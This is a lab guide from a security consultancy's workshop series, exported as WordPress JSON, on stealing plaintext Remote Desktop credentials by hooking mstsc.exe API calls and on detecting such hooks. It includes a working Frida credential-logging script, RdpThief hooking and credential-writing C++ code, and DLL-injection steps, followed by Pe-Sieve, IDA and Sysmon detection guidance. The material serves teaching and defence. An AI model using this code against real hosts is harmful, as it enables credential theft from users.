{"id":7751,"date":"2021-04-07T09:00:00","date_gmt":"2021-04-07T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/?post_type=lab_item&#038;p=7751"},"modified":"2026-05-22T12:53:25","modified_gmt":"2026-05-22T11:53:25","slug":"attack-detection-fundamentals-2021-windows-lab-3","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/","title":{"rendered":"Attack Detection Fundamentals 2021: Windows &#8211; Lab #3"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals 2021: Windows &#8211; <span class=\"blue-text\">Lab #3<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Software Protection                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                07 April, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_1200c3b3b9839b813a487e18a46957cf\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Alfie Champion<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Content navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    Select a section                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Fundamentals workshop series for 2021, we covered advanced defense evasion and credential access techniques targeting Windows endpoints. This included the offensive and defensive use of API hooking, as well as the theft of cookies to enabled &#x27;session hijacking&#x27;.<\/p>\n<p>A recording of the first workshop can be found <a href=\"https:\/\/www.youtube.com\/watch?v=h1OBjMx-R-M\" target=\"_blank\" rel=\"noopener\">here<\/a> and the slides are available <a href=\"https:\/\/www.f-secure.com\/content\/dam\/f-secure\/en\/consulting\/events\/collaterals\/digital\/f-secure_attack-detection-fundamentals-workshop-1-windows_2021-04-07.pdf\" target=\"_blank\" rel=\"noopener\">here<\/a><\/p>\n<p>In the previous lab &#8211; guides available <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-1\/\" target=\"_blank\" rel=\"noopener\">here<\/a> and <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a> &#8211; we developed an initial access payload that explored several defensive (and offensive) concepts. Amongst others, we observed AMSI blocking our Covenant Grunt shellcode, Sysmon logging a CreateRemoteThread event (EID 8), and we emulated an EDR using userland API hooks with Frida. This last concept leads us neatly into our next lab.<\/p>\n<p>One of the core parts of an offensive operation is the post exploitation phase. Post exploitation is a broad term that includes all the attacker&#x27;s actions that are performed after an initial foothold is obtained. Whilst discussing all the post exploitation activities goes beyond the scope of this lab guide, it is possible to refer back to Mitre&#x27;s <a href=\"https:\/\/attack.mitre.org\/matrices\/enterprise\/\" target=\"_blank\" rel=\"noopener\">ATT&amp;amp;CK Matrix<\/a> to have a more comprehensive view of the topic.<\/p>\n<p>For this lab, we&#x27;ll turn the tables on the defensive use of API hooking and apply the same principles in an offensive post exploitation context. We&#x27;ll target a user authenticating to a host using Remote Desktop, and hook the functions that provide us with their plaintext credentials.<\/p>\n<p>API hooking is a concept that was already discussed in the workshops and in the first lab of this series, but in a nutshell we could describe it as a technique used to intercept API calls and perform additional tasks before and after its execution. Examples of use cases for API hooking:<\/p>\n<ul>\n<li>Extending an application&#x27;s functionalities without the need for accessing its source code.<\/li>\n<li>Monitoring of dangerous APIs being used for malicious purposes.<\/li>\n<li>Something nasty we are just about to see.<\/li>\n<\/ul>\n<p>For lab two, we&#x27;re going to demonstrate API hooking leveraging some great <a href=\"https:\/\/www.mdsec.co.uk\/2019\/11\/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients\/\" target=\"_blank\" rel=\"noopener\">research<\/a> published by MDSec, with their tool <a href=\"https:\/\/github.com\/0x09AL\/RdpThief\/\" target=\"_blank\" rel=\"noopener\">RdpThief<\/a>.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>1x Windows VM<\/li>\n<li><a href=\"http:\/\/www.rohitab.com\/apimonitor\" target=\"_blank\" rel=\"noopener\">API Monitor<\/a><\/li>\n<li>Visual Studio 2019 Community Edition<\/li>\n<li><a href=\"https:\/\/github.com\/hasherezade\/pe-sieve\" target=\"_blank\" rel=\"noopener\">Pe-Sieve<\/a><\/li>\n<li><a href=\"https:\/\/www.hex-rays.com\/products\/ida\/support\/download_freeware\/\" target=\"_blank\" rel=\"noopener\">IDA Freeware<\/a><\/li>\n<li>Sysmon<\/li>\n<\/ul>\n<p>DISCLAMER: Set up of the tools and the testing environment is not covered comprehensively within this lab. We will assume basic familiarity with Windows command line and the ability of the reader to build the necessary tools.<\/p>\n<h2>Walkthrough<\/h2>\n<p>Our objective for this lab is not to blindly run a tool, but rather show a methodology and the thought process of both the offensive and the defensive side of the attack. The first step then, is to discern if cleartext credentials are actually being passed by the RDP client when connecting (imagining that we didn&#x27;t already know the outcome of the MDSec research!).<\/p>\n<p>Let&#x27;s start the RDP client, or &quot;mstsc.exe&quot;, and start monitoring its API using API Monitor:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328124935576.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The tricky part about API monitor is that you need to explicitly select the APIs, or classes of APIs, that you want to monitor. A good general approach would be to start including APIs relative to network, security and administration.<\/p>\n<p>Now let&#x27;s attempt to log in using invalid credentials:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328125203799.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Of course the credentials did not work, but if we go back to API monitor we will see that it captured some data:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328125227362.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>From an attacker&#x27;s perspective, we are interested in knowing the following:<\/p>\n<ul>\n<li>The server the victim tried to connect to.<\/li>\n<li>The username used.<\/li>\n<li>The password.<\/li>\n<\/ul>\n<p>API Monitor offers a handy search feature that will inspect all the intercepted data and show us the functions of interest. By either using that, or manually inspecting the captured API data, we can immediately notice that the remote server&#x27;s IP is being passed as a second argument to the &#x27;SspiPrepareForCredRead&#x27; function:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328125900087-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The username was passed as the only argument to the &#x27;CredIsMarshaledCredentialW&#x27; function:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328130535523-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>And finally, the cleartext password was indeed passed to the &#x27;CryptProtectMemory&#x27; API:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328131124613-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Proof-Of-Concept<\/h3>\n<p>Now that we know what to look for, we could whip up a proof-of-concept. In the first <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noopener\">lab<\/a>, we saw how Frida could be used to log the calling of APIs of interest (that time it was our &#x27;NtCreateThreadEx&#x27; call from mshta.exe). We can make use of it here to pull out the credential material provided when authenticating to our remote host.<\/p>\n<p>To demonstrate just a small amount of the huge capability that Frida provides, we will actually hook a slightly different set of APIs. Our &#x27;SspiPrepareForCredRead&#x27; function from Sspicli.dll just as before, but this time we will hook &#x27;CredUnPackAuthenticationBufferW&#x27; from Credui.dll too. As its name suggests, this latter function unpacks the user credentials entered into the login window seen above, once a user opts to initiate the RDP connection to their target host.<\/p>\n<p>FuzzySecurity already has an example Frida script for just this purpose in the example scripts of their <a href=\"https:\/\/github.com\/FuzzySecurity\/Fermion\" target=\"_blank\" rel=\"noopener\">Fermion<\/a> tool repo <a href=\"https:\/\/github.com\/FuzzySecurity\/Fermion\/blob\/master\/Examples\/RdpThief.js\" target=\"_blank\" rel=\"noopener\">here<\/a>. Tweaking it ever so slightly for more readable log output, we can use this script to hook our APIs and extract the output we&#x27;re after:<\/p>\n<pre><code class=\"language-bash\">\/\/--------------------------------------------------------------------------------------------------------------\/\/\n\/\/ RDP credential theft, adapted from research by @0x09AL \/\/\n\/\/ URL: https:\/\/www.mdsec.co.uk\/2019\/11\/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients\/ \/\/\n\/\/--------------------------------------------------------------------------------------------------------------\/\/\n\n\/\/ Native function pointer\nvar pSspiPrepareForCredRead = Module.findExportByName(&quot;SspiCli.dll&quot;, &#x27;SspiPrepareForCredRead&#x27;)\nvar pCredUnPackAuthenticationBufferW = Module.findExportByName(&quot;Credui.dll&quot;, &#x27;CredUnPackAuthenticationBufferW&#x27;)\n\n\/\/ Globals\nvar sTargetHost;\n\n\/\/ This function is called any time the target is updated and when clicking\n\/\/ on connect. We are only interested in the last value that was set before\n\/\/ calling Credui!CredUnPackAuthenticationBufferW.\n\/\/ =&gt; https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/sspi\/nf-sspi-sspiprepareforcredread\nInterceptor.attach(pSspiPrepareForCredRead, {\nonEnter: function (args) {\n\/\/ Update global when the function is called\nsTargetHost = args[1].readUtf16String();\n}\n});\n\n\/\/ This function is only called when the user finally tries to initiate the\n\/\/ connection to the server.\n\/\/ =&gt; https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/wincred\/nf-wincred-credunpackauthenticationbufferw\nInterceptor.attach(pCredUnPackAuthenticationBufferW, {\nonEnter: function (args) {\n\/\/ Save ptr&#x27;s to poll data in onLeave\nthis.pszUserName = args[3];\nthis.pszPassword = args[7];\n},\nonLeave: function (retval) {\nconsole.log(&quot;\\n|-------&quot;);\nconsole.log(&quot;| Server : &quot; + sTargetHost);\nconsole.log(&quot;| User : &quot; + this.pszUserName.readUtf16String());\nconsole.log(&quot;| Pass : &quot; + this.pszPassword.readUtf16String());\nconsole.log(&quot;|-------&quot;);\n}\n});<\/code><\/pre>\n<p>With our script ready, we can hook a running &#x27;mstsc.exe&#x27; process and provide our script as an argument.<\/p>\n<pre><code class=\"language-bash\">frida -n mstsc.exe -l [hooking_script].js<\/code><\/pre>\n<p>We mentioned in the workshop how EDR&#x27;s implement API hooking through the loading of their DLL, and if we fire up <a href=\"https:\/\/github.com\/processhacker\/processhacker\/\" target=\"_blank\" rel=\"noopener\">Process Hacker<\/a> and take a look at our &#x27;mstsc.exe&#x27; process, we can see the same behaviour from Frida as it &#x27;attaches&#x27; to our target process to implement the hooks we&#x27;ve specified.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/frida.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>With Frida set up, when we authenticate, we should see the target host, username and password outputted in the console.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/frida-rdp-hook.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Weaponisation<\/h3>\n<p>So how do we take the concepts we&#x27;ve seen up to now and turn it into something that is more likely to be observed in a legitimate attack? There are multiple ways of intercepting APIs, however the most popular is called &quot;inline hooking&quot;. Inline hooking is a technique where the first bytes of a function are overwritten with a jump to another module (DLL) that can then inspect the parameters passed to the function and eventually restore the execution flow. Inspection of the parameters is achieved in different ways depending on the architecture of the process (x64 vs x86), since in 32 bit processes arguments (in assembler) are passed exclusively using the stack whilst in 64 bit applications it&#x27;s done by a combination of registers and stack.<\/p>\n<p>Luckily we do not need to go that deep to implement hooking, since we can rely on the hard work done to build the <a href=\"https:\/\/github.com\/microsoft\/Detours\" target=\"_blank\" rel=\"noopener\">Detours<\/a> library that we will use to accomplish this. The library simply abstracts the creation of hooks and allows us to use a higher level language such as C++ to create API hooks. We will not write the hooking code from scratch, but rather rely on Rio&#x27;s <a href=\"https:\/\/github.com\/0x09AL\/RdpThief\/blob\/master\/RdpThief\/RdpThief.cpp\" target=\"_blank\" rel=\"noopener\">RdpThief<\/a> work.<\/p>\n<p>Let&#x27;s clone and build the solution in Visual Studio:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328132118148.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>RdpThief&#x27;s code is extremely simple and easy to read. We can see that the core function that gets executed when the DLL is loaded is the following:<\/p>\n<pre><code class=\"language-bash\">if (DetourIsHelperProcess()) {\nreturn TRUE;\n}\n\nif (dwReason == DLL_PROCESS_ATTACH) {\nDetourRestoreAfterWith();\nDetourTransactionBegin();\nDetourUpdateThread(GetCurrentThread());\nDetourAttach(&amp;(PVOID&amp;)OriginalCryptProtectMemory, _CryptProtectMemory);\nDetourAttach(&amp;(PVOID&amp;)OriginalCredIsMarshaledCredentialW, _CredIsMarshaledCredentialW);\nDetourAttach(&amp;(PVOID&amp;)OriginalSspiPrepareForCredRead, _SspiPrepareForCredRead);\nDetourTransactionCommit();\n}\nelse if (dwReason == DLL_PROCESS_DETACH) {\nDetourTransactionBegin();\nDetourUpdateThread(GetCurrentThread());\nDetourDetach(&amp;(PVOID&amp;)OriginalCryptProtectMemory, _CryptProtectMemory);\nDetourDetach(&amp;(PVOID&amp;)OriginalCredIsMarshaledCredentialW, _CredIsMarshaledCredentialW);\nDetourDetach(&amp;(PVOID&amp;)OriginalSspiPrepareForCredRead, _SspiPrepareForCredRead);\nDetourTransactionCommit();\n}\nreturn TRUE;<\/code><\/pre>\n<p>Notice that the &#x27;DetourAttach&#x27; function is responsible for installing the hooks. As an example, the line:<\/p>\n<pre><code class=\"language-bash\">DetourAttach(&amp;(PVOID&amp;)OriginalCryptProtectMemory, _CryptProtectMemory);<\/code><\/pre>\n<p>This can effectively be interpreted as: &quot;Attach a hook to the OriginalCryptProtectMemory function and divert it to my _CryptProtectMemory custom procedure&quot;.<\/p>\n<p>Where &#x27;OriginalCryptProtectMemory&#x27; is the address of the original &#x27;CryptProtectMemory&#x27; and &#x27;_CryptProtectMemory &#x27; is the function that we created, that will save the relevant parameter for later inspection and restore execution to the original function.<\/p>\n<p>We can see for example the &#x27;_SspiPrepareForCredRead&#x27; function&#x27;s body:<\/p>\n<pre><code class=\"language-bash\">SECURITY_STATUS _SspiPrepareForCredRead(\nPSEC_WINNT_AUTH_IDENTITY_OPAQUE AuthIdentity,\nPCWSTR pszTargetName,\nPULONG pCredmanCredentialType,\nPCWSTR *ppszCredmanTargetName)\n{\nlpServer = pszTargetName;\nreturn OriginalSspiPrepareForCredRead(AuthIdentity, pszTargetName, pCredmanCredentialType, ppszCredmanTargetName);\n}<\/code><\/pre>\n<p>The only thing it does is save the address of the remote server (&#x27;pszTargetName&#x27;) and call the original function. The data is then written on disk within the user&#x27;s &#x27;%TEMP%&#x27; folder:<\/p>\n<pre><code class=\"language-bash\">VOID WriteCredentials() {\nconst DWORD cbBuffer = 1024;\nTCHAR TempFolder[MAX_PATH];\nGetEnvironmentVariable(L&quot;TEMP&quot;, TempFolder, MAX_PATH);\nTCHAR Path[MAX_PATH];\nStringCbPrintf(Path, MAX_PATH, L&quot;%s\\\\data.bin&quot;, TempFolder);\nHANDLE hFile = CreateFile(Path, FILE_APPEND_DATA, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\nWCHAR DataBuffer[cbBuffer];\nmemset(DataBuffer, 0x00, cbBuffer);\nDWORD dwBytesWritten = 0;\nStringCbPrintf(DataBuffer, cbBuffer, L&quot;Server: %s\\nUsername: %s\\nPassword: %s\\n\\n&quot;,lpServer, lpUsername, lpTempPassword);\n\nWriteFile(hFile, DataBuffer, wcslen(DataBuffer)*2, &amp;dwBytesWritten, NULL);\nCloseHandle(hFile);\n}<\/code><\/pre>\n<p>We can test it by loading the compiled DLL (the architecture need to match the &#x27;mstsc&#x27; one, usually 64 bit on modern systems) with <a href=\"https:\/\/github.com\/processhacker\/processhacker\/\" target=\"_blank\" rel=\"noopener\">Process Hacker<\/a>:<\/p>\n<ul>\n<li>Select &#x27;mstsc&#x27;<\/li>\n<li>Right-click -&gt; Miscellaneous -&gt; Inject DLL<\/li>\n<li>Select &#x27;RdpThief.dll&#x27;<\/li>\n<\/ul>\n<p>Just as with Frida, you should see the DLL listed in the &#x27;Modules&#x27; section within Process Hacker:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328132926695.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Authenticating to a remote host, you should be able to see your cleartext credentials stored in a file called &#x27;data.bin&#x27; within the %TEMP% folder. Cool eh?<\/p>\n<p>The attack doesn&#x27;t actually stop here, since from an operational perspective it would be better to have shellcode, rather than a DLL that needs to be dropped on disk. The research author used the <a href=\"https:\/\/github.com\/monoxgas\/sRDI\" target=\"_blank\" rel=\"noopener\">sRDI<\/a> project to accomplish that, but we will leave that as an exercise to the reader.<\/p>\n<h2>Detection<\/h2>\n<p>Hooking leaves traces behind, one of them is the fact that we modified the code of the functions that we wanted to intercept. Within Windows, every process refers to the same address when accessing a DLL. However, when a DLL is modified just for one process Windows transparently copies the code of the modified DLL and allows the program to do basically anything with it. This mechanism is called &quot;Write on copy&quot;.<\/p>\n<p>Let&#x27;s use an open source memory scanner to analyse our &#x27;mstsc&#x27; process. We will use &#x27;Pe-Sieve&#x27; for this:<\/p>\n<pre><code class=\"language-bash\">.\\pe-sieve64.exe \/pid 5856\nScanning workingset: 895 memory regions.\n[*] Workingset scanned in 375 ms\n[+] Report dumped to: process_5856\n[*] Dumped module to: C:\\Users\\Developer\\Desktop\\Tools\\\\process_5856\\7ff987be0000.advapi32.dll as UNMAPPED\n[*] Dumped module to: C:\\Users\\Developer\\Desktop\\Tools\\\\process_5856\\7ff978400000.RdpThief.dll as UNMAPPED\n[+] Dumped modified to: process_5856\n[+] Report dumped to: process_5856\n---\nPID: 5856\n---\nSUMMARY:\n\nTotal scanned: 117\nSkipped: 0\n-\nHooked: 2\nReplaced: 0\nHdrs Modified: 0\nIAT Hooks: 0\nImplanted: 0\nUnreachable files: 0\nOther: 0\n-\nTotal suspicious: 2\n---<\/code><\/pre>\n<p>As we can see, some functions were detected as &quot;patched&quot;. Pe-Sieve is kind enough to dump the suspicious DLLs to disk. We can confirm that the DLL &#8211; &#x27;advapi32&#x27; in this case &#8211; was indeed patched, by opening it with IDA and looking for the &#x27;CredIsMarshaledCredentialW&#x27; function:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328133835584.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>We can see that the function&#x27;s body contains only a jump to a foreign module, if we refer back to the screenshot that showed RdpThief being loaded in the RDP client we can see that that address belongs to &#x27;RdpThief.dll&#x27;.<\/p>\n<p>The approach we used is rather manual and tedious and not suitable for automated detection. It might be possible for security products to achieve this though, as they can scan the process memory at scale. However, in certain situations it might be possible to automate part of the detection process. Specifically:<\/p>\n<ul>\n<li>If the malicious DLL gets loaded using DLL injection, the DLL will reside on disk and &#x27;mstsc&#x27; loading it will generate a module load event (Sysmon Event ID 7). The RDP client rarely loads an unsigned DLL from disk, if ever.<\/li>\n<li>If the malicious DLL uses .NET, like FuzzySecurity&#x27;s <a href=\"https:\/\/github.com\/FuzzySecurity\/Sharp-Suite\/tree\/master\/RemoteViewing\" target=\"_blank\" rel=\"noopener\">RemoteViewing<\/a>, &#x27;mstsc&#x27; will also load the CLR (&#x27;clr.dll&#x27;). The RDP client does not normally use .NET and therefore this should be marked as suspicious.<\/li>\n<\/ul>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328143649982.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>Conclusions<\/h2>\n<p>In this lab we&#x27;ve applied the concept of API hooking to post-exploitation, compromising credential material as a user authenticates to a remote host using RDP. We&#x27;ve seen an initial proof-of-concept of this, both manually within API Monitor, and subsequently in a similar way using Frida. Finally, we looked at MDSec&#x27;s RdpThief, which operationalises the concepts we explored.<\/p>\n<p>From a detection perspective, we observed how hooks installed within DLLs can be detected due to Windows&#x27;s &quot;write on copy&quot; mechanism, demonstrated by a scan from Pe-Sieve. We took this a step further and loaded one of the patched DLLs dumped by Pe-Sieve into IDA to identify the &quot;jmp&quot; instruction which introduces our hook functionality.<\/p>\n<p>Finally, we considered other implementations of the RDP authentication-hooking process, and how these could be picked up by module loads, or the anomalous loading of the .NET CLR.<\/p>\n<p>Join us for our <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-4\/\" target=\"_blank\" 